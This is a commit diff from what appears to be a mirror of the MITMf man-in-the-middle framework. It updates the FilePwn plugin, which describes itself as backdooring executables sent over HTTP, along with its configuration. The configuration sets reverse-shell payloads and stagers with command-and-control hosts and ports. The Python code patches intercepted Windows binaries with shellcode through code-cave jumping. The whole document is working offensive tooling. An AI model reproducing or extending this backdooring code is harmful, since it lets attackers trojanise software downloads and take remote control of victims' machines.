github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-08 05:51:48 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Merged Filepwn plugin and config file changes

Browse source
This commit is contained in:
byt3bl33d3r 2015-04-15 00:40:01 +02:00
parent 460399541f
commit 8eb09309d2
3 changed files with 45 additions and 32 deletions
Download patch file Download diff file Expand all files Collapse all files

15
config/mitmf.conf
View file

@ -363,6 +363,7 @@
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
CompressedFiles = True #True/False CompressedFiles = True #True/False
[[[[LinuxIntelx86]]]] [[[[LinuxIntelx86]]]]
SHELL = reverse_shell_tcp # This is the BDF syntax SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2 HOST = 192.168.1.168 # The C2
@ -378,10 +379,12 @@
MSFPAYLOAD = linux/x64/shell_reverse_tcp MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[WindowsIntelx86]]]] [[[[WindowsIntelx86]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = automatic
HOST = 192.168.1.16 HOST = 192.168.1.16
PORT = 4444 PORT = 8443
SHELL = reverse_tcp_stager SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None SUPPLIED_SHELLCODE = None
ZERO_CERT = False ZERO_CERT = False
PATCH_DLL = True PATCH_DLL = True
@ -389,10 +392,12 @@
[[[[WindowsIntelx64]]]] [[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = automatic
HOST = 192.168.1.16 HOST = 192.168.1.16
PORT = 8088 PORT = 8088
SHELL = reverse_shell_tcp SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = Nonepatchpatchpatch SUPPLIED_SHELLCODE = None
ZERO_CERT = True ZERO_CERT = True
PATCH_DLL = False PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp MSFPAYLOAD = windows/x64/shell_reverse_tcp

2
libs/bdfactory

@ -1 +1 @@
Subproject commit 9ce83ead5ddc4daa798b0f144b3cfeece6809c19 Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b

16
plugins/FilePwn.py
View file

@ -78,7 +78,7 @@ class FilePwn(Plugin):
optname = "filepwn" optname = "filepwn"
desc = "Backdoor executables being sent over http using bdfactory" desc = "Backdoor executables being sent over http using bdfactory"
implements = ["handleResponse"] implements = ["handleResponse"]
tree_output = ["BDFProxy v0.2 online"] tree_output = ["BDFProxy v0.3.2 online"]
version = "0.2" version = "0.2"
has_opts = False has_opts = False
@ -123,8 +123,6 @@ class FilePwn(Plugin):
self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist']
self.output.append("BDFProxy by midnite_runr online")
def convert_to_Bool(self, aString): def convert_to_Bool(self, aString):
if aString.lower() == 'true': if aString.lower() == 'true':
return True return True
@ -167,6 +165,10 @@ class FilePwn(Plugin):
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True cave_jumping = True
# if automatic override
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile, targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile), OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'], SHELL=self.WindowsIntelx64['SHELL'],
@ -178,6 +180,7 @@ class FilePwn(Plugin):
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
) )
result = targetFile.run_this() result = targetFile.run_this()
@ -193,6 +196,10 @@ class FilePwn(Plugin):
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True cave_jumping = True
# if automatic override
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile, targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile), OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'], SHELL=self.WindowsIntelx86['SHELL'],
@ -203,7 +210,8 @@ class FilePwn(Plugin):
IMAGE_TYPE=self.WindowsType, IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']) ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
) )
result = targetFile.run_this() result = targetFile.run_this()